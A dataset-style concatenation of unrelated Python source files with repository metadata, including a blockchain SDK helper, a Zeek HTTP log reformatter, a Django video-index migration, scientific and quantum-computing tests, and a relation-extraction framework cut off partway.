2d4b9474b2e2fc5518bba10684c5d5130ffb6328
|
[
"OML"
] | 4 |
2020-07-06T12:13:14.000Z
|
2021-07-29T12:45:27.000Z
|
electrumsv_sdk/builtin_components/electrumsv_server/local_tools.py
|
electrumsv/electrumsv-sdk
|
2d4b9474b2e2fc5518bba10684c5d5130ffb6328
|
[
"OML"
] | 62 |
2020-07-04T04:50:27.000Z
|
2021-08-19T21:06:10.000Z
|
electrumsv_sdk/builtin_components/electrumsv_server/local_tools.py
|
electrumsv/electrumsv-sdk
|
2d4b9474b2e2fc5518bba10684c5d5130ffb6328
|
[
"OML"
] | 3 |
2021-01-21T09:22:45.000Z
|
2021-06-12T10:16:03.000Z
|
import logging
import typing
from electrumsv_sdk.utils import get_directory_name
COMPONENT_NAME = get_directory_name(__file__)
logger = logging.getLogger(COMPONENT_NAME)
if typing.TYPE_CHECKING:
from .electrumsv_server import Plugin
class LocalTools:
"""helper for operating on plugin-specific state (like source dir, port, datadir etc.)"""
def __init__(self, plugin: 'Plugin'):
self.plugin = plugin
self.cli_inputs = plugin.cli_inputs
self.logger = logging.getLogger(self.plugin.COMPONENT_NAME)
def get_network_choice(self) -> str:
network_options = [
self.cli_inputs.cli_extension_args['regtest'],
self.cli_inputs.cli_extension_args['testnet'],
self.cli_inputs.cli_extension_args['scaling_testnet'],
self.cli_inputs.cli_extension_args['main']
]
assert len([is_selected for is_selected in network_options if is_selected]) in {0, 1}, \
"can only select 1 network"
network_choice = "regtest"
if self.cli_inputs.cli_extension_args['testnet']:
network_choice = "testnet"
elif self.cli_inputs.cli_extension_args['scaling_testnet']:
network_choice = "scaling-testnet"
elif self.cli_inputs.cli_extension_args['main']:
network_choice = "main"
return network_choice
| 34.175 | 96 | 0.686906 | 1,122 | 0.820775 | 0 | 0 | 0 | 0 | 0 | 0 | 238 | 0.174104 |
f1be97cb28ba644933394a127fc92f299492f132
| 4,955 |
py
|
Python
|
cluster/core/include/python/http_parser.py
|
JarryShaw/broapt
|
5a6253af862cb618718d8fad69343a23ef2ac9e4
|
[
"BSD-3-Clause"
] | 3 |
2020-04-25T08:47:55.000Z
|
2020-11-04T11:18:21.000Z
|
cluster/core/include/python/http_parser.py
|
JarryShaw/broapt
|
5a6253af862cb618718d8fad69343a23ef2ac9e4
|
[
"BSD-3-Clause"
] | 11 |
2020-06-15T16:28:15.000Z
|
2021-11-29T17:11:07.000Z
|
source/include/python/http_parser.py
|
JarryShaw/broapt
|
5a6253af862cb618718d8fad69343a23ef2ac9e4
|
[
"BSD-3-Clause"
] | 3 |
2019-07-24T02:41:37.000Z
|
2021-12-06T09:38:58.000Z
|
# -*- coding: utf-8 -*-
# pylint: disable=all
import base64
import binascii
import contextlib
import math
import os
import textwrap
import time
import urllib.parse
from const import LOGS_PATH
from logparser import parse
from utils import is_nan, print_file
# from utils import IPAddressJSONEncoder, is_nan, print_file
# today
DATE = time.strftime('%Y-%m-%d')
# log path
LOGS = os.path.join(LOGS_PATH, 'http')
os.makedirs(LOGS, exist_ok=True)
# http log
HTTP_LOG = os.path.join(LOGS_PATH, 'http', f'{DATE}.log')
# macros
SEPARATOR = '\t'
SET_SEPARATOR = ','
EMPTY_FIELD = '(empty)'
UNSET_FIELD = 'NoDef'
FIELDS = ('scrip', 'ad', 'ts', 'url', 'ref', 'ua', 'dstip', 'cookie', 'src_port', 'json', 'method', 'body')
TYPES = ('addr', 'string', 'time', 'string', 'string', 'string', 'addr', 'string', 'port', 'vector[string]', 'string', 'string')
def hexlify(string):
hex_string = binascii.hexlify(string.encode()).decode()
return ''.join(map(lambda s: f'\\x{s}', textwrap.wrap(hex_string, 2)))
def init(HTTP_LOG):
print_file(f'#separator {hexlify(SEPARATOR)}', file=HTTP_LOG)
print_file(f'#set_separator{SEPARATOR}{SET_SEPARATOR}', file=HTTP_LOG)
print_file(f'#empty_field{SEPARATOR}{EMPTY_FIELD}', file=HTTP_LOG)
print_file(f'#unset_field{SEPARATOR}{UNSET_FIELD}', file=HTTP_LOG)
print_file(f'#path{SEPARATOR}http', file=HTTP_LOG)
print_file(f'#open{SEPARATOR}{time.strftime("%Y-%m-%d-%H-%M-%S")}', file=HTTP_LOG)
print_file(f'#fields{SEPARATOR}{SEPARATOR.join(FIELDS)}', file=HTTP_LOG)
print_file(f'#types{SEPARATOR}{SEPARATOR.join(TYPES)}', file=HTTP_LOG)
def make_url(line):
host = line.get('host')
if is_nan(host):
host = str()
uri = line.get('uri')
if is_nan(uri):
uri = str()
url = urllib.parse.urljoin(host, uri)
port = int(line['id.resp_p'])
if port == 80:
base = 'http://%s' % line['id.resp_h']
else:
base = 'http://%s:%s' % (line['id.resp_h'], line['id.resp_p'])
return urllib.parse.urljoin(base, url)
def make_b64(data):
if is_nan(data):
return None
return base64.b64encode(data.encode()).decode()
def make_json(line):
client_headers = line.get('client_header_names')
if is_nan(client_headers):
client_headers = list()
server_headers = line.get('server_header_names')
if is_nan(server_headers):
server_headers = list()
headers = list()
headers.extend(filter(lambda header: not is_nan(header), client_headers))
headers.extend(filter(lambda header: not is_nan(header), server_headers))
return ','.join(filter(lambda header: len(header), headers))
def beautify(obj):
if obj is None:
return UNSET_FIELD
if isinstance(obj, str):
return obj or EMPTY_FIELD
if isinstance(obj, (set, list, tuple)):
return SET_SEPARATOR.join(obj) or EMPTY_FIELD
return str(obj) or EMPTY_FIELD
def generate(log_name):
global DATE, HTTP_LOG
date = time.strftime('%Y-%m-%d')
if date != DATE:
close()
DATE = date
HTTP_LOG = os.path.join(LOGS_PATH, 'http', f'{DATE}.log')
init(HTTP_LOG)
log_root = os.path.join(LOGS_PATH, log_name)
http_log = os.path.join(log_root, 'http.log')
if not os.path.isfile(http_log):
return
LOG_HTTP = parse(http_log)
for (index, line) in LOG_HTTP.context.iterrows():
# record = dict(
# srcip=line['id.orig_h'],
# ad=None,
# ts=math.floor((line['ts'] if LOG_HTTP.format == 'json' else line['ts'].timestamp()) * 1000),
# url=make_url(line),
# ref=make_b64(line.get('referrer')),
# ua=make_ua(line),
# dstip=line['id.resp_h'],
# cookie=make_cookie(line),
# src_port=int(line['id.orig_p']),
# # json=make_json(line),
# method=line['method'],
# body=line['post_body'],
# )
record = (
# scrip
line['id.orig_h'],
# ad
None,
# ts
math.floor((line['ts'] if LOG_HTTP.format == 'json' else line['ts'].timestamp()) * 1000),
# url
make_url(line),
# ref
make_b64(line.get('referrer')),
# ua
make_b64(line.get('user_agent')),
# dstip
line['id.resp_h'],
# cookie
make_b64(line.get('cookies')),
# src_port
int(line['id.orig_p']),
# json
make_json(line),
# method
line.get('method'),
# body
make_b64(line.get('post_body')),
)
# data = json.dumps(record, cls=IPAddressJSONEncoder)
data = '\t'.join(map(lambda obj: beautify(obj), record))
print_file(data, file=HTTP_LOG)
def close():
print_file(f'#close{SEPARATOR}{time.strftime("%Y-%m-%d-%H-%M-%S")}', file=HTTP_LOG)
| 30.030303 | 128 | 0.594147 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,582 | 0.319273 |
f1c021de79d124febfa8a831e976cd4dc12aeed9
| 1,647 |
py
|
Python
|
src/compute_trust_values.py
|
johndpope/FacialRetargeting
|
5fb0c1da6af6c3d59aef264f567bfa7a244d0764
|
[
"MIT"
] | 21 |
2020-08-19T02:52:16.000Z
|
2022-02-25T12:35:04.000Z
|
src/compute_trust_values.py
|
johndpope/FacialRetargeting
|
5fb0c1da6af6c3d59aef264f567bfa7a244d0764
|
[
"MIT"
] | 3 |
2020-10-16T07:11:25.000Z
|
2021-06-30T10:26:04.000Z
|
src/compute_trust_values.py
|
johndpope/FacialRetargeting
|
5fb0c1da6af6c3d59aef264f567bfa7a244d0764
|
[
"MIT"
] | 7 |
2020-08-24T08:30:53.000Z
|
2022-03-28T15:55:24.000Z
|
import numpy as np
from src.compute_corr_coef import compute_corr_coef
from utils.plotting import plot_similarities
def compute_trust_values(dsk, do_plot=False):
"""
Compute trust values following formula 6
k:= number of blendshapes
n:= num_features (num_markers*3)
:param dsk: delta_sk vector (k, n)
:param do_plot: decide if we want to plot the between-correlation matrix
:return: trust values vector (k,)
"""
if len(np.shape(dsk)) != 2:
raise ValueError("[COMPUTE TRUST VALUE] dsk dimensions not supported ({}) instead of 2".format(len(np.shape(dsk))))
# compute between-blendshape correlation
ckl = compute_corr_coef(dsk, dsk)
ckl = np.maximum(ckl, np.zeros(np.shape(ckl)))
if do_plot:
plot_similarities(ckl, "Between blendshapes correlation", vmin=0, vmax=1)
# compute lower triangle
num_k = np.shape(ckl)[0]
low_trig = np.zeros(num_k)
for k in range(num_k):
val = 0
for l in range(k):
val += ckl[k, l]
low_trig[k] = val
max_low_trig = np.max(low_trig)
# compute trust values (formula 6)
tk = np.zeros(num_k)
for k in range(len(tk)):
tk[k] = 1 - low_trig[k]/max_low_trig
return tk
if __name__ == '__main__':
"""
test compute_trust_values function
run: python -m src.compute_trust_values
"""
np.random.seed(0)
from utils.re_order_delta import re_order_delta
# test compute trust values
sk = np.random.rand(6, 3) # (k, n)
sorted_sk = re_order_delta(sk)
tk = compute_trust_values(sorted_sk, do_plot=False)
print("tk")
print(tk)
| 26.564516 | 123 | 0.651488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 629 | 0.381906 |
f1c16c5d4d00c03eee3d9db1e1fe2c9c3aca5189
| 2,042 |
py
|
Python
|
test/core/test_constant.py
|
haikusw/jaqalpaq
|
d507e894cb897756a1e51c99582b736254995b4e
|
[
"Apache-2.0"
] | 8 |
2021-02-19T23:25:28.000Z
|
2021-09-24T20:11:13.000Z
|
test/core/test_constant.py
|
haikusw/jaqalpaq
|
d507e894cb897756a1e51c99582b736254995b4e
|
[
"Apache-2.0"
] | null | null | null |
test/core/test_constant.py
|
haikusw/jaqalpaq
|
d507e894cb897756a1e51c99582b736254995b4e
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from jaqalpaq.core.parameter import ParamType
from jaqalpaq.core.constant import Constant
from . import randomize
from . import common
class ConstantTester(unittest.TestCase):
def test_valid_types(self):
"""Test that a Constant can only be created from valid types."""
valid_values = [
(randomize.random_float(), ParamType.FLOAT),
(randomize.random_integer(), ParamType.INT),
]
for value, kind in valid_values:
const, name, _ = common.make_random_constant(
value=value, return_params=True
)
self.assertEqual(kind, const.kind)
self.assertEqual(name, const.name)
# Note that we can also create a Constant from another Constant, but Jaqal
# currently cannot make use of this functionality.
reg = common.make_random_register()
qubit = common.choose_random_qubit_getitem(reg)
invalid_values = [None, reg, qubit]
for value in invalid_values:
with self.assertRaises(Exception):
Constant(randomize.random_identifier(), value)
def test_value(self):
"""Test that a constant yields the same value it was created with."""
const, _, value = common.make_random_constant(return_params=True)
common.assert_values_same(self, value, const.value)
def test_resolve_value(self):
"""Test that constants ignore the context given in resolve_value and
return their stored value."""
const = common.make_random_constant()
other_const = common.make_random_constant()
context = {const.name: other_const.value}
exp_value = const.value
act_value = const.resolve_value(context)
common.assert_values_same(self, exp_value, act_value)
def test_classical(self):
"""Test that all constants are appropriately labeled as classical."""
self.assertTrue(common.make_random_constant().classical)
if __name__ == "__main__":
unittest.main()
| 37.127273 | 82 | 0.669931 | 1,838 | 0.900098 | 0 | 0 | 0 | 0 | 0 | 0 | 442 | 0.216454 |
f1c26fda7f69a42db47f3f5783c055c679831e9b
| 8,035 |
py
|
Python
|
src/richard/videos/migrations/0001_initial.py
|
pyvideo/richard
|
894f5380e07d7e66453fe730891a21aca32d8edb
|
[
"Apache-2.0"
] | 51 |
2015-01-24T07:53:56.000Z
|
2020-08-30T12:19:39.000Z
|
src/richard/videos/migrations/0001_initial.py
|
westurner/richard
|
894f5380e07d7e66453fe730891a21aca32d8edb
|
[
"Apache-2.0"
] | 34 |
2015-02-23T11:15:00.000Z
|
2016-01-04T11:25:42.000Z
|
src/richard/videos/migrations/0001_initial.py
|
westurner/richard
|
894f5380e07d7e66453fe730891a21aca32d8edb
|
[
"Apache-2.0"
] | 16 |
2015-03-20T17:36:09.000Z
|
2022-01-07T01:04:17.000Z
|
# -*- coding: utf-8 -*-
# richard -- video index system
# Copyright (C) 2012, 2013, 2014, 2015 richard contributors. See AUTHORS.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(help_text='The complete title for the category. e.g. PyCon 2010', max_length=255)),
('description', models.TextField(default='', help_text='Use Markdown', blank=True)),
('url', models.URLField(default='', help_text='URL for the category. e.g. If this category was a conference, this would be the url for the conference web-site.', blank=True)),
('start_date', models.DateField(help_text='If the category was an event, then this is the start date for the event.', null=True, blank=True)),
('whiteboard', models.CharField(default='', help_text='Editor notes for this category.', max_length=255, blank=True)),
('slug', models.SlugField(unique=True)),
('added', models.DateTimeField(auto_now_add=True, null=True)),
],
options={
'ordering': ['title'],
'verbose_name': 'category',
'verbose_name_plural': 'categories',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('iso639_1', models.CharField(max_length=3)),
('name', models.CharField(max_length=20)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RelatedUrl',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('url', models.URLField(max_length=255)),
('description', models.CharField(default='', max_length=255, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Speaker',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(unique=True)),
],
options={
'ordering': ['name'],
'verbose_name': 'speaker',
'verbose_name_plural': 'speakers',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('tag', models.CharField(max_length=30)),
],
options={
'ordering': ['tag'],
'verbose_name': 'tag',
'verbose_name_plural': 'tags',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('state', models.IntegerField(default=2, choices=[(1, 'Live'), (2, 'Draft')])),
('title', models.CharField(max_length=255)),
('summary', models.TextField(default='', help_text='Use Markdown', blank=True)),
('description', models.TextField(default='', help_text='Use Markdown', blank=True)),
('quality_notes', models.TextField(default='', blank=True)),
('copyright_text', models.TextField(blank=True)),
('embed', models.TextField(blank=True)),
('thumbnail_url', models.URLField(max_length=255, null=True, blank=True)),
('duration', models.IntegerField(help_text=b'In seconds', null=True, blank=True)),
('video_ogv_length', models.IntegerField(null=True, blank=True)),
('video_ogv_url', models.URLField(max_length=255, null=True, blank=True)),
('video_ogv_download_only', models.BooleanField(default=False)),
('video_mp4_length', models.IntegerField(null=True, blank=True)),
('video_mp4_url', models.URLField(max_length=255, null=True, blank=True)),
('video_mp4_download_only', models.BooleanField(default=False)),
('video_webm_length', models.IntegerField(null=True, blank=True)),
('video_webm_url', models.URLField(max_length=255, null=True, blank=True)),
('video_webm_download_only', models.BooleanField(default=False)),
('video_flv_length', models.IntegerField(null=True, blank=True)),
('video_flv_url', models.URLField(max_length=255, null=True, blank=True)),
('video_flv_download_only', models.BooleanField(default=False)),
('source_url', models.URLField(max_length=255, null=True, blank=True)),
('whiteboard', models.CharField(default='', max_length=255, blank=True)),
('recorded', models.DateField(null=True, blank=True)),
('added', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('slug', models.SlugField(unique=True)),
('category', models.ForeignKey(related_name='videos', to='videos.Category')),
('language', models.ForeignKey(to='videos.Language', null=True)),
('speakers', models.ManyToManyField(related_name='videos', to='videos.Speaker', blank=True)),
('tags', models.ManyToManyField(related_name='videos', to='videos.Tag', blank=True)),
],
options={
'ordering': ['-recorded', 'title'],
'get_latest_by': 'recorded',
'verbose_name': 'video',
'verbose_name_plural': 'videos',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='VideoUrlStatus',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('check_date', models.DateTimeField()),
('status_code', models.IntegerField()),
('status_message', models.CharField(max_length=255, blank=True)),
('url', models.URLField(max_length=255)),
('video', models.ForeignKey(to='videos.Video')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='relatedurl',
name='video',
field=models.ForeignKey(related_name='related_urls', to='videos.Video'),
preserve_default=True,
),
]
| 49.598765 | 191 | 0.571873 | 7,161 | 0.891226 | 0 | 0 | 0 | 0 | 0 | 0 | 2,303 | 0.286621 |
f1c41c955777189a3b733180afda82b9ed458a7c
| 1,399 |
py
|
Python
|
descwl_shear_sims/tests/test_artifacts.py
|
LSSTDESC/descwl_shear_sims
|
1c696518104b7f301dd6c69571239431c6232110
|
[
"BSD-3-Clause"
] | null | null | null |
descwl_shear_sims/tests/test_artifacts.py
|
LSSTDESC/descwl_shear_sims
|
1c696518104b7f301dd6c69571239431c6232110
|
[
"BSD-3-Clause"
] | 11 |
2019-12-10T23:30:27.000Z
|
2019-12-24T13:59:32.000Z
|
descwl_shear_sims/tests/test_artifacts.py
|
LSSTDESC/wl-shear-testing-sims
|
6e4a0baa6f664b5bc52b08b55614eaa58c8b0748
|
[
"BSD-3-Clause"
] | null | null | null |
"""
copy-paste from my (beckermr) personal code here
https://github.com/beckermr/metadetect-coadding-sims
"""
import numpy as np
import galsim
from descwl_shear_sims.masking import get_bmask_and_set_image
from descwl_shear_sims.artifacts import (
generate_bad_columns,
generate_cosmic_rays,
)
def test_basic_mask():
image = galsim.ImageD(np.zeros((100, 100)))
bmask = get_bmask_and_set_image(
image=image, rng=None, cosmic_rays=False, bad_columns=False,
)
assert np.all(bmask.array == 0)
def test_generate_cosmic_rays_smoke():
rng = np.random.RandomState(seed=10)
msk = generate_cosmic_rays(shape=(64, 64), rng=rng)
assert np.any(msk)
def test_generate_cosmic_rays_seed():
rng = np.random.RandomState(seed=10)
msk1 = generate_cosmic_rays(shape=(64, 64), rng=rng)
rng = np.random.RandomState(seed=10)
msk2 = generate_cosmic_rays(shape=(64, 64), rng=rng)
assert np.array_equal(msk1, msk2)
def test_generate_bad_columns_smoke():
rng = np.random.RandomState(seed=10)
msk = generate_bad_columns(shape=(64, 64), rng=rng)
assert np.any(msk)
def test_generate_bad_columns_seed():
rng = np.random.RandomState(seed=10)
msk1 = generate_bad_columns(shape=(64, 64), rng=rng)
rng = np.random.RandomState(seed=10)
msk2 = generate_bad_columns(shape=(64, 64), rng=rng)
assert np.array_equal(msk1, msk2)
| 25.436364 | 68 | 0.719085 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 109 | 0.077913 |
f1c44279c1c78e6d3ae1d50d41837fb4c6fd7df0
| 2,270 |
py
|
Python
|
stylobate_mgmt/commands/init.py
|
digitaltembo/stylobate-mgmt
|
26483aab27d2496dcbd71d7de2f5780bc43a959e
|
[
"MIT"
] | null | null | null |
stylobate_mgmt/commands/init.py
|
digitaltembo/stylobate-mgmt
|
26483aab27d2496dcbd71d7de2f5780bc43a959e
|
[
"MIT"
] | null | null | null |
stylobate_mgmt/commands/init.py
|
digitaltembo/stylobate-mgmt
|
26483aab27d2496dcbd71d7de2f5780bc43a959e
|
[
"MIT"
] | null | null | null |
from getpass import getpass
import os
from .utils import Command
from .db import DB
class Init(Command):
name = 'init'
description = "Initializes a new Stylobate project, forking the original"
def add_args(self, parser):
parser.add_argument(
'name',
type=str,
help='The name of the stylobate project'
)
parser.add_argument(
'directory',
type=str,
nargs='?',
help='Path to the directory that the project will be placed in'
)
def main(self, args):
parent_dir = args.directory if args.directory else os.getcwd()
name = args.name
self.initialize_project(args.name, parent_dir)
def initialize_project(self, project_name, parent_dir):
self.print('Initializing new project {} in directory {}'.format(project_name, parent_dir))
self.execute('gh repo create -d "Stylobate-based Web Application" {}'.format(project_name), abs_dir=parent_dir)
proj_dir = os.path.join(parent_dir, project_name)
proj_ctxt = self.context.new_context(proj_dir)
if not os.path.isdir(proj_dir):
# So they shouuuld say yes while creating the repo to make this git directory locally, but they may not
proj_ctxt.execute('mkdir {}'.format(project_name))
proj_ctxt.execute('git init')
else:
# GitHub CLI clones the remote repo over HTTP :(
proj_ctxt.execute('git remote remove origin')
username = self.input("Username for 'https://github.com'")
proj_ctxt.execute('git remote add origin [email protected]:{}/{}.git'.format(username, project_name))
proj_ctxt.execute('git remote add upstream [email protected]:digitaltembo/stylobate.git')
proj_ctxt.execute('git pull upstream master')
proj_ctxt.execute('git push -u origin master')
proj_ctxt.execute('python -m venv venv', 'backend')
proj_ctxt.execute('venv/bin/pip install -r requirements.txt', 'backend')
proj_ctxt.execute('yarn install', 'frontend')
username = self.input("Superuser email")
password = self.input("Superuser password")
DB(proj_ctxt).add_superuser(username, password)
| 33.382353 | 119 | 0.644934 | 2,178 | 0.959471 | 0 | 0 | 0 | 0 | 0 | 0 | 821 | 0.361674 |
f1c47788397390c41f153d775e370f60b472f99d
| 628 |
py
|
Python
|
leetcode_submissions/7.reverse-integer.18198620.ac.py
|
aenon/online_judge
|
bff3991519cd4f2d80dea9b17680dbc5d4c44b9b
|
[
"MIT"
] | null | null | null |
leetcode_submissions/7.reverse-integer.18198620.ac.py
|
aenon/online_judge
|
bff3991519cd4f2d80dea9b17680dbc5d4c44b9b
|
[
"MIT"
] | null | null | null |
leetcode_submissions/7.reverse-integer.18198620.ac.py
|
aenon/online_judge
|
bff3991519cd4f2d80dea9b17680dbc5d4c44b9b
|
[
"MIT"
] | 1 |
2015-01-10T16:02:43.000Z
|
2015-01-10T16:02:43.000Z
|
#!/usr/bin/env python
# Reverse Integer https://oj.leetcode.com/problems/reverse-integer/
# Reverse digits of an integer.
# Example1: x = 123, return 321
# Example2: x = -123, return -321
#Math
# Xilin SUN
# Dec 7 2014
class Solution:
# @return an integer
def reverse(self, x):
if x > 2147483646:
return 0
if x < -2147483647:
return 0
isPositive = True
if x < 0:
isPositive = False
x = -x
rev = 0
while x != 0:
rev = 10 * rev + x % 10
x = x / 10
if rev > 2147483646:
return 0
if rev < -2147483647:
return 0
if isPositive:
return rev
return -rev
| 19.030303 | 68 | 0.593949 | 395 | 0.628981 | 0 | 0 | 0 | 0 | 0 | 0 | 240 | 0.382166 |
f1c529b5976d0a2cdf007169fc8e0ee8525206e1
| 1,400 |
py
|
Python
|
src/z3c/configurator/tests.py
|
zopefoundation/z3c.configurator
|
390416d2fa61ddf97c28e6af32eae3660bb725e2
|
[
"ZPL-2.1"
] | null | null | null |
src/z3c/configurator/tests.py
|
zopefoundation/z3c.configurator
|
390416d2fa61ddf97c28e6af32eae3660bb725e2
|
[
"ZPL-2.1"
] | 1 |
2021-01-08T15:34:08.000Z
|
2021-01-08T15:34:08.000Z
|
src/z3c/configurator/tests.py
|
zopefoundation/z3c.configurator
|
390416d2fa61ddf97c28e6af32eae3660bb725e2
|
[
"ZPL-2.1"
] | 1 |
2015-04-03T05:49:32.000Z
|
2015-04-03T05:49:32.000Z
|
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
#############################################################################
"""Configurator Test Setup"""
import re
import doctest
from zope.component import testing
from zope.testing.renormalizing import RENormalizing
def setUp(test):
testing.setUp(test)
def tearDown(test):
testing.tearDown()
def test_suite():
checker = RENormalizing((
(re.compile("u'(.*?)'"), "'\\1'"),
(re.compile("<type 'unicode'>"), "<class 'str'>"),
(re.compile("zope.schema._bootstrapinterfaces.RequiredMissing"),
"RequiredMissing"),
(re.compile("zope.schema._bootstrapinterfaces.WrongType"),
"WrongType"),
))
return doctest.DocFileSuite(
'README.txt',
setUp=setUp, tearDown=tearDown, checker=checker,
optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)
| 31.818182 | 78 | 0.620714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 835 | 0.596429 |
f1c67bf4245b574bcd2ed4dfcba7d08e3e6e8419
| 174 |
py
|
Python
|
example.py
|
LucasHazardous/SkinReaper
|
c910cebe2aed3dd8e442515e4415f3e253e5a4ac
|
[
"MIT"
] | null | null | null |
example.py
|
LucasHazardous/SkinReaper
|
c910cebe2aed3dd8e442515e4415f3e253e5a4ac
|
[
"MIT"
] | null | null | null |
example.py
|
LucasHazardous/SkinReaper
|
c910cebe2aed3dd8e442515e4415f3e253e5a4ac
|
[
"MIT"
] | null | null | null |
from skin_reaper import SkinReaper
if __name__ == "__main__":
r = SkinReaper()
data = r.harvestLinks(5)
r.setSkinPreview()
r.collectRandom(data)
r.kill()
| 21.75 | 34 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.057471 |
f1c6b2f9d9acd98dcef1131f691572e33395120a
| 528 |
py
|
Python
|
time_to_speech.py
|
besi/stereopi
|
c03a1ae990af67dde4e2cd832a20b49d697de230
|
[
"MIT"
] | 2 |
2020-02-18T18:10:50.000Z
|
2020-08-04T21:00:29.000Z
|
time_to_speech.py
|
besi/stereopi
|
c03a1ae990af67dde4e2cd832a20b49d697de230
|
[
"MIT"
] | 4 |
2020-02-19T10:46:02.000Z
|
2021-01-09T18:52:45.000Z
|
time_to_speech.py
|
besi/stereopi
|
c03a1ae990af67dde4e2cd832a20b49d697de230
|
[
"MIT"
] | null | null | null |
# Credits go to <http://codereview.stackexchange.com/q/37522>
import random
import time
def current_time():
'''Returns a tuple containing (hour, minute) for current local time.'''
local_time = time.localtime(time.time())
return (local_time.tm_hour, local_time.tm_min)
(hour, minute) = current_time()
def ishtime(hours, minutes):
hours = hours % 24
if minutes == 0:
return(str(hours) + ' sharp')
return(str(hours) + ' . . . and ' + str(minutes) + ' minutes')
print(ishtime(hour, minute))
| 22 | 75 | 0.657197 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 163 | 0.308712 |
f1c6e01e5913573733f519b9c5d164e6fed7195b
| 575 |
py
|
Python
|
setup.py
|
ckuzma/solar-viability-tester
|
c34d03d1914374279ca269ab402eb5074f7555a6
|
[
"MIT"
] | null | null | null |
setup.py
|
ckuzma/solar-viability-tester
|
c34d03d1914374279ca269ab402eb5074f7555a6
|
[
"MIT"
] | 2 |
2017-04-03T13:59:00.000Z
|
2017-04-06T04:57:50.000Z
|
setup.py
|
ckuzma/solar-viability-tester
|
c34d03d1914374279ca269ab402eb5074f7555a6
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='solar-viability-tester',
version='1.0.0',
description='Solar viability tester utilizing the AT&T IoT Starter Kit and PubNub.',
long_description=long_description,
url='https://github.com/ckuzma/solar-viability-tester',
license='Apache-2.0'
)
| 30.263158 | 89 | 0.707826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 230 | 0.4 |
f1c78560c5fc55f8dc09c8791ab3fa9dcc1ccd67
| 31,028 |
py
|
Python
|
framework/framework.py
|
wbqhb/SEPC
|
1a5e03b70984b759b615424dc06f530d5de00f51
|
[
"MIT"
] | null | null | null |
framework/framework.py
|
wbqhb/SEPC
|
1a5e03b70984b759b615424dc06f530d5de00f51
|
[
"MIT"
] | null | null | null |
framework/framework.py
|
wbqhb/SEPC
|
1a5e03b70984b759b615424dc06f530d5de00f51
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 2021/5/4 下午3:05
# @Author : godwaitup
# @FileName: framework.py
# original framework for joint extraction.
import torch.optim as optim
from torch import nn
import os
import data_loader
import torch.nn.functional as F
import numpy as np
import json
from functools import partial
from data_loader import cmed_collate_fn
import torch
def _to_sub(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
if lang is 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
if head_only:
ret.add(triple[0].split(" ")[0])
else:
ret.add(triple[0])
return ret
def _to_obj(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
if lang is 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
if head_only:
ret.add(triple[2].split(" ")[0])
else:
ret.add(triple[2])
return ret
def _to_ep(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
if lang is 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
if head_only:
_h = triple[0].split(" ")
_t = triple[2].split(" ")
ret.add(tuple((_h[0], _t[0])))
else:
ret.add(tuple((triple[0], triple[2])))
return ret
